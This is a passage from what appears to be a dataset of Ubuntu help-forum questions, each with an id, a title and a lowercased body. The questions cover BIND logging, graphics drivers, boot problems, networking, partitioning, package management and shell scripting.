named [ 1110 ] : reading built-in trusted keys from file '/etc/bind/bind.keys' may 20 21:47:46 c1 named [ 1110 ] : using default udp/ipv4 port range : [ 1024 , 65535 ] may 20 21:47:46 c1 named [ 1110 ] : using default udp/ipv6 port range : [ 1024 , 65535 ] may 20 21:47:46 c1 named [ 1110 ] : listening on ipv4 interface lo , 127.0.0.1 # 53 may 20 21:47:46 c1 named [ 1110 ] : generating session key for dynamic dns may 20 21:47:46 c1 named [ 1110 ] : sizing zone task pool based on 25 zones may 20 21:47:46 c1 named [ 1110 ] : using built-in dlv key for view _default may 20 21:47:46 c1 named [ 1110 ] : using built-in root key for view _default may 20 21:47:46 c1 named [ 1110 ] : set up managed keys zone for view _default , file 'managed-keys.bind' may 20 21:47:46 c1 named [ 1110 ] : command channel listening on 127.0.0.1 # 953 may 20 21:47:46 c1 named [ 1110 ] : isc_file_isplainfile '/var/log/named/query.log ' failed : permission denied may 20 21:47:46 c1 named [ 1110 ] : configuring logging : permission denied may 20 21:47:46 c1 named [ 1110 ] : loading configuration : permission denied may 20 21:47:46 c1 named [ 1110 ] : exiting ( due to fatal error ) named.conf.log prevew root @ c1 : /etc/bind # cat named.conf.log logging { channel query_log { file `` /var/log/named/query.log '' versions 3 size 5m ; // set the severity to dynamic to see all the debug messages . print-category yes ; print-severity yes ; print-time yes ; severity dynamic ; } ; channel update_debug { file `` /var/log/named/update_debug.log '' versions 3 size 5m ; severity debug ; print-category yes ; print-severity yes ; print-time yes ; } ; channel security_info { file `` /var/log/named/security_info.log '' versions 3 size 5m ; severity info ; print-category yes ; print-severity yes ; print-time yes ; } ; channel bind_log { file `` /var/log/named/bind.log '' versions 3 size 5m ; severity info ; print-category yes ; print-severity yes ; print-time yes ; } ; category queries { query_log ; } ; category security { security_info ; } ; category update-security { update_debug ; } ; category update { update_debug ; } ; category lame-servers { null ; } ; category default { bind_log ; } ; } ; command named-checkconf returns no errors
469869	juju sync-tools on maas 502 bad gateway error	1 ) i have maas server on vm with 4 node all ubuntu 14.04 trusty 2 ) i use server ( host of vms ) as juju server i tried to bootstrap juju i got this error : error juju.cmd supercommand.go:300 gomaasapi : got error back from server : 502 bad gateway
469874	dual gpus ? both ati and nvidia	i 'd like to install both an nvidia gpu and an ati gpu . since i 'm using opencl , i need the proprietary drivers for each . i 've had troubles updrading to proprietary drivers and doing it successfully twice with all the potential conflicts worries me . ( i.e.- after a reboot , the gui never initializes , necessitating a recovery or rebuild . ) can it be done successfully ?
469876	html5 audio wo n't play 14.04	i have been unable to hear anything in any html5 player , and it started today . my sound card works fine , and it even says that youtube or some other html5 player is playing audio , but i can not hear it . i 've tried clearing the cache , restarting chrome , restarting the computer , running updates , and re-installing chrome . i also get the same result when i try this with chromium . any ideas ?
469882	how to solve this startup and shutdown problem	i am a newbie to ubuntu and linux and facing a shutdown problem . the system does n't shut down and hangs . similarly while startup grup does not show time and halts at grub screen . it does not automatically load default os on dual boot laptop . how to solve this problem ? thanks .
469885	unable to access bios in my laptop after installing ubuntu 14.04	i have a sony vaio s series that came with windows 7 and u installed ubuntu 14.04 by creating a bootable usb , setting the boot priority in the bios and booting from it . during the installation , i chose to completely erase my hd and install ubuntu . the system installed correctly and i have been using ubuntu and loving it = ] . today , however , i tried to install windows alongside ubuntu . i tried to change the boot priority in the bios to boot from my windows cd but i just realized that i 'm no longer able to access the bios screen ! when i press f11 during the laptop power-up , the message `` operating system not found '' is displayed . i also tried f1 , f12 , del , fn+f2 , etc . but nothing worked . i 've tried googling for a fix , but everything i found was beyond my comprehension ( i 'm still learning how to use linux ) . if someone could explain to me in layman terms what is going on here and how could i solve this i 'd appreciate it a lot . if technical terms or procedures can not be avoided , i 'd ask you to please add some links explaining the concepts used .
469886	is there a fork or continuation of ubuntu builder for ubuntu 14.04 ?	i am looking for a fork or continuation of the ubuntu builder project for ubuntu 14.04 . i have had no luck building it from the source , so that is why i am looking for this .
469888	how to update a machine from packages downloaded on a different but similarly configured machine ?	i have two laptops with similar configuration . i have updated one and would like to use the cached packages of this to update the other one . i can not find a way . i did ctrl+a then enter but machine hangs badly . how to do the update without creating problems ?
469890	how to install ubuntu in my windows laptop	i have downloaded the ubuntu iso file and i am new to the linux and in learning phase . how can i setup ubuntu in my laptop ?
469897	where would i find instructions to drive `` ubuntu web browser '' ?	i 'd like to give it a run , but i can not use it , and the interface is n't intuitive . for example , how do i show : the address bar forward and backward buttons activity ( history ) etc ?
469899	lxpanel does not load automatically	i just upgraded from 12.04 to 12.10 , i had to repair the video driver and xorg installation . after a long struggle i get it working but several problems remain : i am using lxde ( lubuntu ) desktop . after login , there is just a blank screen with the mouse pointer . i have to right click to bring up the context menu and then open terminal and issue `` lxpanel & '' to bring up the panel . i tried re-installing lxde / openbox / lubuntu but the problem persists . during the repair , i had to un-install xserver-xorg-video-intel because it seems to freeze . i am using the on-board integrated graphics card , which seems to be intel 's . this is part of /var/log/xorg.0.log : does it show which driver i 'm using ? [ 75580.024 ] ( ii ) loader magic : 0x7fe9ac318b20 [ 75580.024 ] ( ii ) module abi versions : [ 75580.024 ] x.org ansi c emulation : 0.4 [ 75580.024 ] x.org video driver : 12.2 [ 75580.024 ] x.org xinput driver : 16.0 [ 75580.024 ] x.org server extension : 6.0 [ 75580.025 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0102:1849:0102 rev 9 , mem @ 0xf7800000/4194304 , 0xe0000000/268435456 , i/o @ 0x0000f000/64 [ 75580.025 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 75580.025 ] ( ii ) loadmodule : `` extmod '' [ 75580.025 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 75580.025 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 75580.025 ] compiled for 1.12.4 , module version = 1.0.0 [ 75580.026 ] module class : x.org server extension [ 75580.026 ] abi class : x.org server extension , version 6.0 [ 75580.026 ] ( ii ) loading extension mit-screen-saver [ 75580.026 ] ( ii ) loading extension xfree86-vidmodeextension [ 75580.026 ] ( ii ) loading extension xfree86-dga [ 75580.026 ] ( ii ) loading extension dpms [ 75580.026 ] ( ii ) loading extension xvideo [ 75580.026 ] ( ii ) loading extension xvideo-motioncompensation [ 75580.026 ] ( ii ) loading extension x-resource [ 75580.026 ] ( ii ) loadmodule : `` dbe '' [ 75580.026 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 75580.026 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 75580.026 ] compiled for 1.12.4 , module version = 1.0.0 [ 75580.026 ] module class : x.org server extension [ 75580.026 ] abi class : x.org server extension , version 6.0 [ 75580.026 ] ( ii ) loading extension double-buffer [ 75580.026 ] ( ii ) loadmodule : `` glx '' [ 75580.026 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 75580.026 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 75580.026 ] compiled for 1.12.4 , module version = 1.0.0 [ 75580.026 ] abi class : x.org server extension , version 6.0 [ 75580.026 ] ( == ) aiglx enabled [ 75580.026 ] ( ii ) loading extension glx [ 75580.026 ] ( ii ) loadmodule : `` record '' [ 75580.026 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 75580.026 ] ( ii ) module record : vendor= '' x.org foundation '' [ 75580.026 ] compiled for 1.12.4 , module version = 1.13.0 [ 75580.026 ] module class : x.org server extension [ 75580.026 ] abi class : x.org server extension , version 6.0 [ 75580.026 ] ( ii ) loading extension record [ 75580.027 ] ( ii ) loadmodule : `` dri '' [ 75580.027 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 75580.027 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 75580.027 ] compiled for 1.12.4 , module version = 1.0.0 [ 75580.027 ] abi class : x.org server extension , version 6.0 [ 75580.027 ] ( ii ) loading extension xfree86-dri [ 75580.027 ] ( ii ) loadmodule : `` dri2 '' i tried to change background color . the usual settings window appears which allows me to choose the color , but then nothing is changed and background remains black . on the desktop background , when i right click , the openbox context menu appears , which seems different from what i used to get ( but i do n't know what it was ) .
469900	boot options for kickstart install method not recognized	i 'm successfully installing 12.04 using pxe , as shown below : label ubuntu12.04 menu label ubuntu 12.04 kernel images/ubuntu/12.04-amd64/linux append initrd=images/ubuntu/12.04-amd64/initrd.gz -- ks=http : //10.0.1.0/ks.ubuntu this successfully loads the netboot kernel+init , starts up anaconda , and loads my ks.ubuntu file . inside ks.ubuntu i have the location of installation media : url -- url http : //10.0.1.0/ubuntu/12.04-amd64/ i want this url in my pxe file , so i can use the ks.ubuntu for multiple ubuntu versions . with centos , i can append either method= or inst.ks= ( they are aliases ) to the boot options . i only have one ks.centos file and use method= to setup install media for the selected version . ubuntu does n't seem to recognize either option , and defaults to using an internet installation instead of my local mirror . any thoughts or help would be really great !
469904	alpsps/2 alps glidepoint on lenovo g530 no responsivity ubuntu 14.04	after trying numerous workarounds and suggestions from all over the internet i 'm ready to ask for help on this one . the laptop model is a lenovo g530 . distro is ubuntu studio 14.04 ( 64-bit ) since installing there has been no functionality at all in the touchpad ( no button clicks , scrolling , cursor movement , anything ) . xinput list detects : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb opticalwheel mouse id=9 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=12 [ slave pointer ( 2 ) ] ⎜ ↳ alps ps/2 device and both the settings > mouse and touchpad dialogue and gpointing-device-settings recognize the alps glidepoint ( and the generic ps/2 device ) and detect them as functional . similarly , xinput list-props `` alpsps/2 alps glidepoint '' returns me values so that means the system knows the touchpad is there . i 've seen this issue over and over again with updates going back years ( including in these forums ) , but the solutions seem to vary widely depending on what model laptop is affected , and i have n't seen anything describing my specific issue . the only progress i 've had at all is after installing psmouse/alps-1.3 as described here http : //forums.debian.net/viewtopic.php ? f=16 & t=95940 and running sudo modprobe -r psmouse sudo modprobe psmouse i get cursor movement and button click until i take my fingers off the trackpad , then it disables itself and disappears from the xinput list ! ! ! based on what i 've read it seems the kernel recognizing the touchpad as a generic mouse causes problems because that supercedes the touchpad recognition . but i have yet to find a working solution . i have n't been keeping perfect track of everything i 've tried but i guarantee when people start throwing solutions at me they will get a lot of `` tried that , did n't work '' responses from me . please let me know any further data you need to help me solve this issue . thanks
469905	unable to copy the following message shows : `` no such file or directory ''	i just recently installed ubuntu 14.04 server to host an open source human resources software with 20 computers on our office network . i am new to linux and i really need everyone 's help ! sudo cp -r /var/lib/ihris/lib/4.1.9/ihris-manage/sites/blank /var/lib/ihris/sites/manage i 'm using the above command to copy but the following message shows : '' cp : can not stat â/var/lib/ihris/lib/4.1.9/ihris-manage/sites/blankâ : no such file or directory '' what do i missed ? ! everyone 's kind assistance is greatly appreciated ! thank you ,
469906	samba guide says that samba 4+ does not use `` security mode ''	i tried thsese settings : force create mode = 0770 force directory mode = 0770 but this only affects creation of files and directories . what can i do to prevent samba users from changing file/directory permissions ?
469914	unable to locate package ubuntu-after-install	sudo apt-get install ubuntu-after-install does not work . i just installed ubuntu , so i do n't know if there 's a problem with my installation..
469915	control the screen resolution of an external projector with a long cable	i 'm using a lenovo w530 with ( soon to be upgraded ) 12.10 . whenever i plug-in an external moitor screen resolution discovery is accurate and i can use dual screen mode happily . however the situation is different when plug-in a external projector . using a modern projector with the supplied display cable , detection works well , however with older projectors or when there is a ( long ) cable extension between laptop and projector ( as it is common in conference rooms and hotels ) , resolution discovery fails and the only option is 640x480 . this bug has been reported . how can i improve the resolution discovery ( or change the resolution manually ) ?
469917	how to find the directory on which a particular command is executed ?	i already installed nautilus-open-terminal package . so i can openup terminal from any directory . like that i opened a terminal from a directory ( i forgot it 's path ) and executed apt-get download vlc command . we all know , apt-get download command will download the package to the current directory itself . because of i forgetted the directory path , i do n't know where these packages are located . i tried history command , it shows only the below commands . 1986 man cdrecord 1987 cd foo-bar 1988 history 1989 apt-get download vlc it failed to mention the directory on which a particular command ( apt-get download vlc ) is executed . if it displays the directory , it will be easy to find the location of downloaded pacakges . 1989 ~/desktop apt-get download vlc is that possible to make history command like above ? is there any way to find the directory on which a particular command is executed ?
469920	no confirmation prompts when deleting a file or a directory	when deleting a file or a folder , i do n't get a prompt requesting confirmation of the deletion ( the way i 'm used to with windows ) .
469925	how can i configure the express keys for my intuos drawing tablet ?	i am running xubuntu 14.04 and my tablet is cth-680 or intuos pen and touch medium . i used xsetwacom to assign key press a , b , c , d to buttons 1 to 4 of `` wacom intuos pt m finger pad '' but when i assigned the fourth button , xsetwacom showed me unsupported offset into 'wacom button actions ' property . when i tried to test the express keys only thebuttons which were assigned to the buttons to the left of the tablet worked . the buttons at the right were still the same ( forward and back ) . when i tried the other devices , the buttons that change are the pen 's . i am still new to linux , so it would be appreciated if the answer would be easy to understand .
469927	how can i manually remove a corrupt package ?	currently i 'm trying to remove mongodb , but when i try to execute using one of the commands below ; sudo apt-get purge mongodb mongodb-clients mongodb-server mongodb-dev sudo apt-get purge mongodb-10gen sudo apt-get autoremove gives me an output as nothing relating to the package that i 've installed root @ master : / # sudo apt-get purge mongodb mongodb-clients mongodb-server mongodb-dev reading package lists ... done building dependency tree reading state information ... done package 'mongodb ' is not installed , so not removed package 'mongodb-clients ' is not installed , so not removed package 'mongodb-dev ' is not installed , so not removed package 'mongodb-server ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . root @ master : / # sudo apt-get purge mongodb-10gen reading package lists ... done building dependency tree reading state information ... done package 'mongodb-10gen ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . root @ master : / # apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . all the commands simply outputs as they 're not installed . any advise on this will be great .
469928	areas under autohiding kde panels not clickable in fullscreen apps	if you set any panel to autohide in kde , it will make it 's area unclickable in fullscreen apps even though it 's not shown .
469932	re-sizing partition to install windows alongside ubuntu	i installed ubuntu in my hard drive without making any separate partitions . now i would also like to install windows 8 but i 'm unable to re-size using gparted . how can separate free space on my hard disk and install windows .
469933	what happens if i keep both windows and ubuntu operating system ?	i 'm now trying ubuntu live from a flash drive . i kind of like it , but at the same time i paid a lot for my windows 7 . can someone explain me what will cause/happen if i keep both of them ? i heard something about the disk split ( partitioning ) or something . all i want to know is what happens with my 1tb hard drive . will my documents still be there ?
469936	startup script to unmount and re-mount a usb device	i have a microsoft wireless mouse and it has a scrolling issue in ubuntu . the scrolling is too sensitive . i 've read in other threads that the solution to this is unplugging the usb receiver of the mouse and then plugging it back . this indeed works but is a very uncomfortable solutions . my question is : is there a script i could run on startup to unmount the usb and mount it back , and if so how would i do something like that ? thanks in advance !
469940	can boost 1.54 install with libboost_thread-mt.so like library files using apt-get install libboost-all-dev command	when installing boost in ubuntu 13.10 i used apt-get install libboost-all-dev command . in this case library files which are ending with -mt.so ( such like libboost_thread-mt.so , libboost_system-mt.so , libboost_filesystem-mt.so , and so on ) can not be found . installed version of boost is 1.54 so can i verify whether the mentioned library files ( such like libboost_thread-mt.so , libboost_system-mt.so , libboost_filesystem-mt.so , and so on ) are available with boost 1.54 default installation ( apt-get install liboost-all-dev ) .
469944	internet connection slow with intermittent drops	is there a default firewall in 14.04 lts ? my speed will build up to 200k at best then shoots back down to zero and sometimes causes my connection to crash . all other devices on my wireless network download over 1/mbps and have no problem streaming live video except on my new laptop with said 14.04lts . just getting back into ubuntu and just installed 14.04 lts . is there something which will ensure my connection stays stable , as it seems something keeps making it go to zero . also youtube on my launcher says i need flash , but i have flash and flash plugin installed , adobe works on chrome as i added the plugin but my live streams are choppy on laptop but perfect on phone using same wireless connection . the launcher version of ubuntu does n't recognize flash . please help never want to go back to windows but really green on linux
469945	how to save command line output to text file ?	there has been several situations where i needed to save the output of a given command line directly to a text file . is there a way to save the output of any command line i run on terminal into a text file ?
469948	cbp : server , unattended-updates and vmware tools ?	what 's current best practice for headless vmware servers and automatic security updates ? for non-critical servers i currently set auto-updates with a reboot , but because i 've installed vmware-tools from the host i often need to manually re-run /usr/bin/vmware-config-tools.pl to get the modules updated . a pain . does anyone here have thoughts on `` would you like to enable vmware automatic kernel modules ? '' when running /usr/bin/vmware-config-tools.pl ? should i move from the host-supplied vmware-tools to ( a ) those from the repos at http : //packages.vmware.com/tools/esx or ( b ) the multiverse open-vm-tools ? - and do these actully resolve the modules problem ?
469949	linux partition system	while installing ubuntu , i only created two partitions for ubuntu one for swap and i formatted the other as ext4 and set mount point as `` / '' . the operating system is working flawlessly . i was just reading a few ubuntu install guides and found that most of them suggest creating more partitions and mount them as `` /root '' , `` /home '' , etc , etc . is there a difference between the two sorts of install methods ? is there a performance difference between the two methods ?
469951	can not find sound settings menu in ubuntu 14.04 after removing pulseaudio	i can not get any audio out of my speakers but the headphones work fine in ubuntu 14.04 . you can find my question about that here . therefore i followed the instructions online and removed and reinstalled pulseaudio and alsa-base . but now i can not find my sound settings menu . i tried reinstalling them again , but it did not work . the headphones still work though . any idea what 's wrong ?
469957	can i install ubuntu 12.04 lts using ubuntu 14.04 lts trail version ?	so my ubuntu 12.04 files are corrupted so i got ubuntu 14.04 on a flash drive and i am currently booting using the drive . so i was wondering is there and way by which i can reinstall ubuntu 12.04 lts using the same drive or using ubuntu 14.04 trail version . just for the record , i do not want ubuntu 14.04 lts . i do n't want to install it . please answer . thank you
469958	i am not able to open update manager	i got this error message : e : the package ttf-mscorefonts-installer needs to be reinstalled but i ca n't find an archive for it . when i am trying to open update manager . what should i do ?
469960	network manager icon not visible in system tray	a few weeks ago i updated to ubuntu gnome 14.04 lts ( clean install ) and i noticed that the network manager icon is missing from the system tray . i have been going through a number of forums , but i could n't find a solution that would fix this problem . my /etc/network/interfaces only contains the following : auto lo iface lo inet loopback also , when calling nm-applet from the console it outputs : nm-applet-message : using fallback from indicator to gtkstatusicon any ideas on how this could be fixed ?
469964	mobile broadband not showing in network manager ?	i just installed a hp hs2350 module in my laptop - it was `` donated '' from a new laptop , same model as mine ( hp probook 6570b ) , that did n't need the module . i 've never had issues with mobile broadband in linux before - both built-in ( like this ) and usb modems , but this time is different - it just does n't show up ! i checked the /lib/udev/rules.d/77-mm-ericsson-mbm.rules and it already has this modem listed , and i can see it when doing a dmesg and lsusb - still it does n't show up - what can i try ? there should also be a gps module in this card , that i would like to play with , but i have no idea how to enable that either ... any suggestions would be helpfull ( yes , i already spent a lot of time googling for a solution ) ... best regards , thomas
469965	what all can i learn while using ubuntu ?	i have been using ubuntu for 3 months now . i was using windows 7 before that . my experience with ubuntu makes me to forget about windows . i am learning commands and the ways to do each and every thing from terminal . although , i do n't have much knowledge about ubuntu right now but i want to learn more and more about ubuntu . what else can i learn about ubuntu ? apart from learning commands , what else can i learn ?
469967	will ubuntu run fine on my laptop ? please help	i have a dell latitude d630 currently running windows xp professional , should i upgrade to the latest ubuntu ? and can my laptop handle it ? thanks allot
469972	how to repair /etc/apt folder	my /etc/apt directory removed from my laptop . how can i rebuild that directory ? my os is ubuntu 14.04
469974	system freezing on hibernate : `` saving 11700 image data pages ''	i recently upgraded from lubuntu 12.04 to 14.04 , and now every time i try to hibernate the computer , the system freezes with this : saving 11700 image data pages ( press backspace to abort ) ... 0 % i 'm not sure if it 's a bug or mis-configuration on my end .
469976	no internet connection after the upgrade from 12.04 to 14.04 lts	upgraded ubuntu desktop server from 12.04 to 14.04 lts and it ca n't connect to the internet after . i 've also tried issuing apt-get update command but i 'm get an error as below : err http : //ph.archive.ubuntu.com trusty inrelease err http : //ph.archive.ubuntu.com trusty-updates inrelease err http : //ph.archive.ubuntu.com trusty-backports inrelease err http : //security.ubuntu.com trusty-security inrelease err http : //extras.ubuntu.com trusty inrelease reading package lists ... done w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/trusty-updates/inrelease w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/trusty-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/inrelease i did n't change anything in my network configuration ( see below ) eth0 link encap : ethernet hwaddr b8 : ac:6f:24:6c:7c inet addr:192.168.23.133 bcast:192.168.23.255 mask:255.255.255.0 inet6 addr : fe80 : :baac:6fff : fe24:6c7c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:44316 errors:0 dropped:0 overruns:0 frame:0 tx packets:1103 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4004261 ( 4.0 mb ) tx bytes:176751 ( 176.7 kb ) interrupt:21 memory : fe6e0000-fe700000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:511 errors:0 dropped:0 overruns:0 frame:0 tx packets:511 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:40241 ( 40.2 kb ) tx bytes:40241 ( 40.2 kb ) virbr0 link encap : ethernet hwaddr ee:6e:1d:9b:48 : fb inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) output of cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.23.133 netmask 255.255.255.0 broadcast 192.168.23.255 gateway 192.168.23.17 any advise on this ? update ~ $ ping google.com ping : unknown host google.com ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.23.17 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.23.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0 cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten
469977	tool/command to know the speed of individual network connections	from my ubuntu server i usually connect to different networks for codebase/builds downloads . is it possible to monitor the speed that i get while downloading/uploading from these individual servers . have tried different tools available on net through forums but not much useful . any help would be helpful
469979	please 'translate ' solution to 'filesystem check or mount failed ' from ubuntu to kubuntu	during upgrade i was told to close some kde-dienst ( it 's all in german ) , i allowed kubuntu to close that and the system ( apparently ) shot down and could never boot again . there seems to be a solution for ubuntu ( lots of praising replies ) : mount -o remount , rw / dpkg -- configure -a mount -o remount , ro / however kubuntu only shows me a list on how to use the mount command after i type in the first line . can someone please 'translate ' it from ubuntu to kubuntu ? thanks already
469981	how to copy a file 's content to an other without erasing the destination file 's content ?	i run cat source.txt > destination.txt . all the content of the destination file is overriden . how can i copy a file 's content to an other file without erasing the destination file ' content ?
469988	is it a good idea to try to compile tesseract 3.02 on ubuntu 14.04 ?	i have ubuntu 14.04 on my notebook , and i am going to work with tesseract by compiling it for some computer science related research . am i on a good path ? svn of tesseract provides only 3.02 as i understood . should i download unstable 3.03 to be compatible with ubuntu 14.04 ? https : //code.google.com/p/tesseract-ocr/wiki/compiling tells that 3.02 is compatible with 12.04 and 3.03 is compatible with 14.04 . i wonder as i said is it a problem to work with 3.02 on ubuntu 14.04 thanks
469990	bash if password filled save it	i am trying to save a password to gnome keyring via python script . the python script will be runned from bash script if password is filled in zenity gui . example : user inserts hes/hers password to zenity password input and if the password is filled it will be saved to gnome keyring via python script , but if the password field is empty it moves on to next command that asks to input the password again . so this is what i want to accomplish : get_password ( ) { zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' password : '' -- hide-text } wpassword= $ ( get_password ) || exit while [ `` $ ( expr match `` $ wpassword '' ' . ' ) '' -lt `` 1 '' ] ; do zenity -- error -- title= '' error in password ! '' -- text= '' please check your password ! password field can not be empty ! '' || exit wpassword= $ ( get_password ) || exit done once password field is filled then the bash script will run the python script to save the password to gnome keyring and then move to next command in script after the python script has been run and has saved the password . this is example if $ get_password = true run save_pw.py how do write it in bash ?
469991	how to run scripts as user ( not as root ) in lightdm ?	i want to run some scripts before login every time my pc is started . i add the scripts in as greeter-setup-script in lightdm.conf . however , all the scripts are running as root ! i want to use normal user account ( e.g . myusername ) to run these script . is it possible to do so ? i try to include `` su - myusername '' in the scripts , but it does not work ...
469992	add new resolution mode with xrandr	currently my resolution is set to 1920x1080 . i want to change the resolution to something like 1280x720 , but 1920x1080 is the only option available . i want to change the resolution , because i have low fps in a game , and in the game the only possible resolution also is 1920x1080 . i use ubuntu 13.10 and have an aspire v5-573g , with a intel core i5 4200u with integrated graphic card and an additional nvidia graphic card , which usually is deactivated in ubuntu . at the end i pasted the output of lspci . with xrandr -q i get xrandr : failed to get size of gamma for output default screen 0 : minimum 1920 x 1080 , current 1920 x 1080 , maximum 1920 x 1080 default connected primary 1920x1080+0+0 0mm x 0mm 1920x1080 0.0* i then tried to add a new resolution option with xrandr . i got the parameter to xrandr -- newmode with cvt 1280 720 . the following commands xrandr -- newmode `` 1280x720_60.00 '' 74.50 1280 1344 1472 1664 720 723 728 748 -hsync +vsync xrandr -- addmode default 1280x720_60.00 xrandr -- output default -- mode 1280x720_60.00 give me the output xrandr : failed to get size of gamma for output default xrandr : configure crtc 0 failed after the commands with xrandr -q additionally 1280x720_60.00 59.9 appears in the output . when i instead select the resolution via the gui setting i get the following error . the selected configuration for displays could not be applied required virtual size does not fit available size : requested= ( 1280 , 720 ) , minimum= ( 1920 , 1080 ) , maximum= ( 1920 , 1080 ) so , how can i lower my resolution ? output of lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 01:00.0 3d controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) 04:00.0 network controller : qualcomm atheros ar9462 wireless network adapter ( rev 01 ) 05:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5287 ( rev 01 ) 05:00.1 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 14 )
469994	google chrome black screen in xubuntu 14.04	i have an issue with the latest update of google chrome on my xubuntu 14.04 . when i open a browser , it 's webpage region is completely black , only toolbars are visible . when i try to resize or move browser 's window it jumps to the bottom right corner of the screen and i ca n't get it out of there . the screenshot : i 've tried to re-install it , but it did n't help . how do i fix it ? update # 1 i 've installed the latest version of chromium-browser just to see how it will perform . there is no black screen in it , but i still have the problem of moving/resizing it 's window .
469995	installing ubuntu from usb stick gives error : `` operating system not found ''	i am trying to install ubuntu from a usb disk on my dell inspiron 7537 , but i get the error message : operating system not found . i have tried to disable uefi and use legacy but without success .
469997	mounting a partition on both os x and ubuntu	i 'll be reinstalling os x on my macbook and i would like to use both ubuntu and osx . can i make 3 partitions , one for each os and the third for /home and mount the /home partition on both os-es ? is there any better way to do it ? i want to keep everything as clean and tidy as possible . thank you .
470002	problem with setting static ip on ubuntu server 14.04	i have a problem setting static ip on my ubuntu server 14.04 lts . i run the command sudo nano /etc/network/interfaces and than change dhcp to static and then i type address , netmask , network , gateway , dns-nameservers and then i try to do simply ping command but its not working for let say ( ping yahoo.com ) i get error ( ping : unknown host yahoo.com ) and sometimes destination unreachable . i also tried to connect throught putty but thats only local ip.what i need actually is a real ip ( like this 109.92.21.200 ) so i can connect throught putty which i have on my laptop and connect to server which is desktop on port 22 which is open but i constantly getting error like connection timed out or connection refused . can somebody tell me solution of problem and show me that . thanks in advance .
470003	installing glibc from source	i want to install a different version of glibc on my ubuntu 12.04 . the questions are 1 ) is it safe to have two versions of glibc on a system ? 2 ) should i remove the current installed glibc ? how ? 3 ) what is the procedure to install a new glibc ?
470004	error while installing gnome in trusty tahr	i am getting a lot of errors while installing gnome 3 on latest ubuntu version [ trusty tahr ] some of those are like this and before this another error was displayed stating that you have broken packages and when i typed the command sudo apt-get install -f they wore done but when i try to get it downloaded through the software centre this error is shown can i get any solution for this issue when i restart my pc it again says me that i have broken packages and when i type the command sudo apt-get install -f this thing appears and all goes in vain
470009	what are the equivalent bash cli commands for this graphical actions ?	i have a problem with the audio system and sip clients ( all of them ) if i switch off and on phonon from the kde graphical ui then for some time the audio works fine again refering to the picture , what i do is change profilo from the value duplex stereo analogico to the value off , then i aplly changes , and then again i set back profilo to duplex stereo analogico and apply changes i would like to know what are the equivalent bash cli commands for this graphical actions . so that i can write a script that would me much faster and easier to me .
